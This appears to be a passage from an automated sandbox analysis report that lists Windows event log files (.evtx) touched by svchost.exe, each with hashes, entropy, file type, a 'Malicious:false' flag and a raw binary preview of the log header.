                            Preview:ElfChnk.........j...............j........... ......x.M.....................................................................%H3.................v...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................f ..........................................................O.......................**..............l..-T...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.0546332508278664
                            Encrypted:false
                            SSDEEP:768:8S/Bp+UdTU8UqOUyGUwaUpcuUvKUruU6DUZ5UtaUKOUpSUv2UwLiUIGUE:l7
                            MD5:496EB71ED74DC943A067BCC74776C336
                            SHA1:2E2F5DB4BCD244012D4F1CB981CB30EEC91DEC97
                            SHA-256:68F8F19B298EFA74F652B0F919DF223A41E6C6D8A160BE223DBEF6ACC7896AC3
                            SHA-512:FE84E150B56757E893CCFADF2240EAD57C080C6FB983BEA2D5EC1D95C6D1A331C265E26F54BCC1BD710837F2E03286BF154C8B8BF3C6812AE92689D618D57201
                            Malicious:false
                            Preview:ElfChnk......................................d..(g..:.^.......................................................................S.................C...........................=...................................}.......................<...............................................................f...............?...............................................M...F...........................................................&.......................................................................................**..h.............h............>.&.........>..'.W.U2..9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 19, DIRTY
                            Category:modified
                            Size (bytes):69632
                            Entropy (8bit):4.134048447104968
                            Encrypted:false
                            SSDEEP:768:y3MEYS9jvhCeqi4hqQ4D/OX/VDbUlVZzaNwJcYCIl8QVQzo:GMEYwCVDbUV5ayJcYzl1VYo
                            MD5:A2795989505D486A468AA1506C6F555E
                            SHA1:2C613470037754E5E9091A837D5C3204854EDCEB
                            SHA-256:597C1000FA0387A378C705E8CA2D8640E36A8D56F0C254B68FF03134C6EA92BD
                            SHA-512:712BDAD1BDA5B7AEE5CDEA261DEE215C9E28D1CCE6C66414BCC2F00455B5FC0B0654A34E5A68D055917F6E3C59524B7FC9344C01C7C868D190C0209D1FF85CA7
                            Malicious:false
                            Preview:ElfFile.....................................................................................................................)..|........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.4236203751533226
                            Encrypted:false
                            SSDEEP:96:URNVaO84oOCaapCaBYKrjjYRCaapCaiMCaapCaiBCaapCaiYTCaapCai:uV7RgpzVvOgprgpGgpJgp
                            MD5:4E74FCE0470D23DF0F687A31FFAACE5C
                            SHA1:ED264127049105A4A8B61BB6241DE12E2AB17A56
                            SHA-256:56BEE73CD26DA1EBC3466A61C47F571564FD10FC66878CB82DB7771D97E4FC01
                            SHA-512:CAD12655F1417452BE306D3F1C32CA277347B5E0D0A9AF042C23F19935AC8BFC23D9D36F56037B272BF73B2F3EF5666697AB23DA24A52EEF4D3CE168ECE29B90
                            Malicious:false
                            Preview:ElfChnk.....................................8.......FM.......................................................................,.................|...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................................U...................................................................**..............<k}/T...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.325791615922006
                            Encrypted:false
                            SSDEEP:384:mOhw202J2q2u2gD2w2A2lCDLCICoC12SV222q2NE292Z2Y2226x2W2S2iCsCv2Eu:VI4SGWLd7URa
                            MD5:3BB4D726B4ED6A236AC6F593796BE537
                            SHA1:0BCF9228D9F25F02947B05366783C87446C57C07
                            SHA-256:88D9B2F5A28333F6289FAC27D5BEAED29B75C90281AB4106D4BBCC4E26EE253D
                            SHA-512:CC7131582172587994E4640570D8F71A897F87AA4F85F7729D91351098BDC8BEB26FC00858709F08BABE113600561EB1B696FD0886D052CD3FFAB2A3069C2EA0
                            Malicious:false
                            Preview:ElfChnk.!.......^.......5.......r..........................................................................................8.$z................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F............................]..................................&...........................................................QD......................**..p...5.......Hn............/X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):70808
                            Entropy (8bit):4.473670379451042
                            Encrypted:false
                            SSDEEP:1536:ms5yC8ca2m14+26MJ9/CjlGHR8vbCLSEuk5kvv1hBpzYfsiC0+O6FGXnaKLaWLT3:ms5yTca2m14+26MJ9/CjlGx8vbCLSEuo
                            MD5:34EE2DCDF44485601B6B00D072ED68CE
                            SHA1:6D040681806B111286FACE402D292497912E25CC
                            SHA-256:26161159FD85BB6D069D5B1EDBF0128A16CF3CAC97573DC3C12120D5A2C6F233
                            SHA-512:DACDCDA40AEB950BEBD33203B79C85E1404A7B477C4761050D1E84B227F859ABEF88F7961CD638654EDCCA7E19549C8C75D40DC2ECD883DB6E5E5298FCAE9B79
                            Malicious:false
                            Preview:ElfChnk.d...............d............................p........................................................................C.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&................................s.......a...........v..a_..I\...............c......**..x.............g3........../X.P&...............................................................8.......P.....!....nqm......... ..g3......>7......>7...................................*.R..N.3.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e..n30'.|D..Q.R.a.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......LI\........n.d.ox...**..(............Nh3........../X.P&...............................................................8.......P.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.353507703228985
                            Encrypted:false
                            SSDEEP:384:yhP787lKD747G74R707F27r87Y7q7t7A7d07nd7D7u72737k7Y7TN7M7Q7B7I7Va:yYciJE4Siq
                            MD5:98735D5F2D6A07618E1ABE4C320AA65E
                            SHA1:4693AA3BD51AB5B5B6F65B3A2346C93C9C024616
                            SHA-256:F9FB80665C9A081831FAC8AF3B044F234BCD73884C72DEEF3714E636E90A0A97
                            SHA-512:D92E80AA98B5EB32257E262122FD3E153D9EEE45713849635F36EA48E13AA20A3629EEAEA190C544B2119DC04FB024BACBA290F0C5C6975121759CEA861A86DE
                            Malicious:false
                            Preview:ElfChnk...............................................1,.......................................................................>........................................ ...=...........................................................................................................................f...............?...........................m...................M...F...........................................]...................&...........................................................e.......................**................+........../X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.2486120203665445
                            Encrypted:false
                            SSDEEP:384:FhwuTDFbuJuuDu/uVuuvu7uu6uOuU/ueuu/uFuuVuauUmuPuuAutuu2kuzjuUauT:FHawuFBow0cjyh4xXmu16S
                            MD5:C0ACE3A0F8B15DD52E3856F0D3176A49
                            SHA1:FD20DA260307E85C78656027101F23FE7FAFAA74
                            SHA-256:4FAAFE20AAFD3A05319486F4A4E992F8002CC8AA6E345238B5A009EE44A09DDD
                            SHA-512:90A39E5A1269BB794F46609B4A57C9348687686DDC37DE08E86ADBC91E5317CC54A7C5F4EED87F59A92FD9F4888938C2BF176347F735D6B9CD26636A047DDBFB
                            Malicious:false
                            Preview:ElfChnk.6.......V.......=.......]............:...<..........................................................................es3........................................F...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...................................................o...............................**......=........*............/X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):94904
                            Entropy (8bit):4.6800151357495565
                            Encrypted:false
                            SSDEEP:768:peWucCWw25LcbyhonqAeWucCWw25LcbyhonqTJDxZmqkbbyWunkPx72nfbyVpbyQ:H0Gw0GenMs5kSoL0GBS
                            MD5:B1EDD232211615AAEA6E74614BF42614
                            SHA1:8A1EE93A0668DD505E659A65F00F7BCF57D188DC
                            SHA-256:D511DEFD5760A64A346D1F3D7436DC2B1143F5F7B13C90B04DEA22A0BB8F8592
                            SHA-512:05EFE2263ABFDD57E1E7C7B261BBCB02A6B5B8F5CBAA4B60A045B426D18C59A35D24787CB4537D5099B3C12E45ED3CF718E0720C7EE116487D8790515745B4CC
                            Malicious:false
                            Preview:ElfChnk......................................%...'....7......................................................................../........................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...............................5...................................................**.................}........../X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.8665352787002663
                            Encrypted:false
                            SSDEEP:768:dvgffnPNm/2sY3pLwIkJ2jLHbj9fr7w2imMFopTMFwr:GGaY
                            MD5:ED879A651F97ED920F7175EECE9019E7
                            SHA1:ADF4B83036B86D20A2D720D73C4A43B50638B342
                            SHA-256:22C129C7F3B6EBA8DBDFB4B78C32D1550BAB4A2075E63649D018E3770AFE45D4
                            SHA-512:67F21982F12BE55FB287524155E3322CA2CC7DA60017AB00F4C979605D3F31030AAD86B82D451AA8BC954255E37D244D534157ACE268862FF346688F84D6B6DA
                            Malicious:false
                            Preview:ElfChnk.........9...............9...................W..L........................................................................................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................fC...................................................................1..............**................8.S...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):67776
                            Entropy (8bit):2.0816242545478114
                            Encrypted:false
                            SSDEEP:384:0XhMiFpXhMiFboryorOoroortorVorVorNorrmo4oruorlIoreorNorworgorDob:Shdh8qGO4
                            MD5:54F384A4FB1E28EA5041C786EECC4DDB
                            SHA1:E904FE48796578E35584272B6B50604781202501
                            SHA-256:A0CB62316891D0529ECA02CEDBCB18004DFA05BA8EF5F51A91A46FC03C4A91DA
                            SHA-512:42D6112EE79020B2704CD80A88E33095E4D57FD8910D166F4B0A42ADD7A084D65D9749CAEED5990F0C0228C73B390E49352BC7299CE4FD8ABDFA4DC8489D7534
                            Malicious:false
                            Preview:ElfChnk......................................................................................................................#.*................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...................................................................................**.............._'~3........../X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.274481744467521
                            Encrypted:false
                            SSDEEP:1536:IKoKKK3KOKbKrK7KAKqKpK0KXKAK8KTK+KfKvKYKqK4KGKkKhKjK9KyKeKhK1KKR:IKoKKK3KOKbKrK7KAKqKpK0KXKAK8KTG
                            MD5:EF1FB698F3F3F7B8FFBDE6ED33C4029A
                            SHA1:8B267C46D1FA74AE8227B1643F681F4B974E6500
                            SHA-256:1B6AB2A1DFFA97778F6498F8B4749546A1A1BD9B0160C044C3DED31E1DD3CEB7
                            SHA-512:6183560AC7AA21A2AB2CF30F55363115B3C0D69050631F3A41D58E6818716BD76681E05C0B2812FA9E0A6C6C0A2A56A992F99F185AB26C4CF28A07FE7935A83E
                            Malicious:false
                            Preview:ElfChnk.....................................h_...a....*.......................................................................Zv................,...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...................................................................................**..H...........N..)........../X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.8643456315451834
                            Encrypted:false
                            SSDEEP:768:Nka8NLadaFaRa9a1aJaJa1apahaZada1aNa1adaoakaAa8asaYakagaYa4awacaj:sN
                            MD5:8F166C41A56FAD34C661EC2E381B843C
                            SHA1:9C6FEBBB409324AA8565555DD75608F8E0E2ACE9
                            SHA-256:0489D8247E838A3FB9880E8DA9900DA19D87B6DDE47182EE846081EE41FA121E
                            SHA-512:01D531A57AEA1C80321EBAC94CE2D47A1AA4924481BE4791D47F44173E939815D5C4EE3B798D3AC18649464A4431B50953C1EE5C28929E89D595E7D0C1E23AC5
                            Malicious:false
                            Preview:ElfChnk.....................................X... ...f;7........................................................................H................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...............................................9...................................**..H........................./X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.8187108550918736
                            Encrypted:false
                            SSDEEP:384:ZhNXDcXxzXZXeX/XOXMXauXLiXCXVX1XYXZXeX+XiXfXuXFXRX9XsX5XLXzXgXy8:ZyAg9JXHqOT
                            MD5:080903EE3E53385275B315ECC75AF406
                            SHA1:C7624D533619618D6B7EA4B0FDE3FCF5A329B6DA
                            SHA-256:E8ADC0BCABD15563F7D7ECCF285A31DB9FC89D85ECA4D35C7694B645497D506C
                            SHA-512:736CFEE45B2523DBE76337E4F15D2091E8C540512F80FE8BDC134FD4A54D6C0ADA8FE27336CC98F27541157D4EB11A75A52447C2F054662716C584159556BD74
                            Malicious:false
                            Preview:ElfChnk.........<...............<...........H.......}^.......................................................................+..................j...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................C...............................................................**..............C..?T...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.8632102618611432
                            Encrypted:false
                            SSDEEP:384:w9hQ+My+s+yn+G+q/U+F+KP+tQ+1+ss+2+1+z+B+Kx+3B+b+M+T3+0+5+U+S+u+5:w9k6rO9i
                            MD5:6FAC2B6C02F9D0AFA45E58FAC3EF7E3F
                            SHA1:780663BADC1391600F8C27954F68BEBE846A0973
                            SHA-256:DD3A39B62CD58E4641CA2AB706C230B02EB25A448C6C776A86CDE14EFD767E46
                            SHA-512:0E12736725E3BBB29195DFF75E03F99210D8369EF13A63DC9E87563F52E8003108A10F6FEA87F9E99F2FA4E052E4CDD4C963C929EA2F46FD19533317C062BFF0
                            Malicious:false
                            Preview:ElfChnk.........'...............'...........([..H]...fO........................................................................`................J...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................#...............................**...............6w-T...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):115304
                            Entropy (8bit):4.262636543295488
                            Encrypted:false
                            SSDEEP:384:QRF/R4wRRREFRFiR+h88uR+8FRRPksoR9bReSRAlRcMRI/R1GRLpRggRrTRaqR7j:tF9wjFSmtXwjFu
                            MD5:E587BEDC70348FBF8ADD76751D2FECFB
                            SHA1:DBBF5B0A8287DDC837D3C4123B082D47A8D83FFB
                            SHA-256:DF0FC05917FF071397526986D8D9CCC5F6B4FF19EA22A92D222378E414D9017E
                            SHA-512:AB4B453F1F2E29BEA81D8E80AD95922F2ACA11ADC282F326249A28BA0320C16508C13E6EDDFC124A5804985A3C8BDD8DCE9DA024E576A35428AAC76E731E90C5
                            Malicious:false
                            Preview:ElfChnk.....................................X...p...1.<....................................................................._+0M............................................=...................................................................%......................................................f...Z..........?...............................I.......?.......M...F...............}..........................................&...............................................(.......................................**..............VE.0............>.&...............................................................<.......T...I.!................@VE.0......>7......>7.................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l................{.F[P'.ok.........A.............)-..O.p.e.r.a.t.i.o.n._.S.t.a.r.t.e.d.O.p.e.r.a.t.i.o.n.a.l...o....j.....3.h.t.t.p.:././.m.a

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.2644117823770085
                            Encrypted:false
                            SSDEEP:384:DhcBwBhBwBOBwB8BwBhBwBF8BwBFBwBabBwBPBwBuBwBOBwBLBwBeBwBbBwBCBwh:DhP8bEDZJ
                            MD5:6FA4E45F3E95B20B5A728798F8ED935C
                            SHA1:48ECBA3CADA6A57ED3A8EADB01D2F1A3D05901AA
                            SHA-256:063BED26B9983316208166039D38F4553B6FC51F69284286AF29D5B946C0ABB0
                            SHA-512:67CDF6407DAEE6A8B80CE82899D64C1822D93738D6294CC7106C354C512B27A1EA1D437F1E89CECF77AABACFB6679C084AE03D647B72D41D77CD7344F407A959
                            Malicious:false
                            Preview:ElfChnk............................................_........................................................................i.i............................................=...........................................................................................................................f...............?...........................m...................M...F...................g...........................................&...............................O...................................................**.. ............]o........../X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\OneApp_IGCC.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.4186118180164757
                            Encrypted:false
                            SSDEEP:1536:QKSTCLKnS+/y3F1Qhxf27SVSVTuziNljVNG/:K
                            MD5:387310B592EB81FA27CED9AFA0EEE988
                            SHA1:5E222396DA602AABF19B5A8AC6F1978546E5FAFB
                            SHA-256:C5E57096F10CF6062B51A19BC14A589A2523F1286B85AB52A12453FE748F3FC4
                            SHA-512:9BF5A2E2391419C173FBA70A52670DEBE867BC2BEA913A8895F36A0D47B6CB981DDED642A8A2A711B2C9E78ABF0E4C082770C39BFD265A0F014CE34F99459EC1
                            Malicious:false
                            Preview:ElfChnk.............................................6#D.....................................................................................................................=...........................................................................................................................w...............P...........................~...................M...m...........................x...............................................................&.......................................................**..`.........................|.=O&.......|.=O.s.Q...W.E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..j............{..P.r.o.v.i.d.e.r...G....=.......K...N.a.m.e.......O.n.e.A.p.p._.I.G.C.C._.W.i.n.S.e.r.v.i.c.e..A..M............a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V

                            C:\Windows\System32\winevt\Logs\Security.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):68120
                            Entropy (8bit):4.347041848155836
                            Encrypted:false
                            SSDEEP:384:eXvFRLXvFR2zoeoUoeDvnQNoKMtvoHoH+uo/8o1eof+5of+Pof+pof+Xof+Ro/Eh:mN5NKgCZ/9
                            MD5:A87DE5B7FE06DFBEAFDDBC49E1E8B7B3
                            SHA1:EFD2D9EFB144AB3906A2B000F642B82022DD03DB
                            SHA-256:362C57EF756807A67BB91D98F57F75EDCD9C701833B760E8935771425F61E2CD
                            SHA-512:B44814D9130B842BC77A2E75F033D0F8C81D1C6864488B12493D2C05A31551F11C1817D0467C7B3CE8613BDCF9F884EEDCADC8FD06B2A691824822E7971D6B7F
                            Malicious:false
                            Preview:ElfChnk.................Qm......Qm..................S7.m......................................................................'.....................s...h...............N...=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...........................&...................................................................................................................**......Qm......e.................&...........0.P\...3.Du?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                            C:\Windows\System32\winevt\Logs\System.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):80496
                            Entropy (8bit):4.471677737461399
                            Encrypted:false
                            SSDEEP:384:XFRjJrB9G19O+z9FRjJrB9G19O+zJKbTN4QS7bQT8utPUyASJdUKq4m+Fpk87kky:VZ9aZ9xhASJJnTukQJ9LMvlZ96
                            MD5:E1AB89D6550D7B72335DD4D29114627E
                            SHA1:0134F13F2F2741428B99608FD10E4F221E4B2709
                            SHA-256:003CB67DE3F450C2C89A57CCCC525A973551482D693FF23A25B559487A782473
                            SHA-512:94B2E119C0A6F29356F84032CDFA5EAE9C60C83E6E913E0C60C0964D6C49AAA22E0C7B2D8BC8590B456970760E14156848851866F23B5EC0FB8353A5AB946BD9
                            Malicious:false
